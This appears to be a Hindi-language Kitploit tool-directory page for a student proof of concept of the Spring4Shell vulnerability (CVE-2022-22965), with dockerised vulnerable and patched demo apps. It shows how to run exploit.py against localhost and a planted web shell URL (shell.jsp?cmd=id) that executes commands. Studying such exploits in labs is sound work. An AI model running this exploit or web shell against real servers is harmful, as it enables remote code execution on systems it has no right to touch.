Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CS4239-Spring4Shell-POC — CVE-2022-22965 proof of concept for CS4239 report | Kitploit
उपकरण/GitHubGitHub/xenosf/cs4239-spring4shell-poc
Vulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubxenosf/cs4239-spring4shell-poc

CS4239-Spring4Shell-POC

CVE-2022-22965 proof of concept for CS4239 report

रिपॉजिटरी देखें
9 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CS4239-Spring4Shell-POC

CVE-2022-22965 (Spring4Shell) के लिए अवधारणा का प्रमाण, CS4239 G410 रिपोर्ट के लिए। इस PoC से अनुकूलित किया गया है, जो असुरक्षित और पैच किए गए व्यवहार को प्रदर्शित करता है।

डेमो चलाना

इस रिपोर्टरी में एक समान स्रोत कोड वाले 2 उदाहरण प्रोग्राम (डॉकरीकृत) हैं। एक Spring Boot के असुरक्षित संस्करण का उपयोग करता है जबकि दूसरा पैच किए गए संस्करण का। Tomcat ने भी इस भेद्यता के लिए एक पैच जारी किया, लेकिन इस डेमो के लिए Spring पैच के प्रभावों को अलग करने के लिए Tomcat का वही असुरक्षित संस्करण उपयोग किया गया है।

डेमो ऐप चलाने के लिए:

root@kitploit:~
docker compose build
docker compose up
  • असुरक्षित:
    • localhost:8080/helloworld/greeting
    • tomcat 9.0.56 (असुरक्षित), spring boot 2.6.3 (असुरक्षित spring framework 5.3.15 पर निर्भर करता है)
  • पैच किया गया:
    • localhost:8081/helloworld/greeting
    • tomcat 9.0.56 (असुरक्षित), spring boot 2.6.6 (पैच किए गए spring framework 5.3.18 पर निर्भर करता है)

एक्सप्लॉइट चलाने के लिए:

root@kitploit:~
# असुरक्षित
python exploit.py --url "http://localhost:8080/helloworld/greeting"

# पैच किया गया
python exploit.py --url "http://localhost:8081/helloworld/greeting"

यदि एक्सप्लॉइट काम करता है, तो एक नया पृष्ठ दिखाई देगा जो हमें कमांड चलाने की अनुमति देता है। id चलाने का उदाहरण:

root@kitploit:~
http://localhost:8080/shell.jsp?cmd=id

एक्सप्लॉइट पैच किए गए संस्करण के लिए काम नहीं करता है - shell.jsp इंजेक्ट नहीं किया गया है।

टूल डाउनलोड करें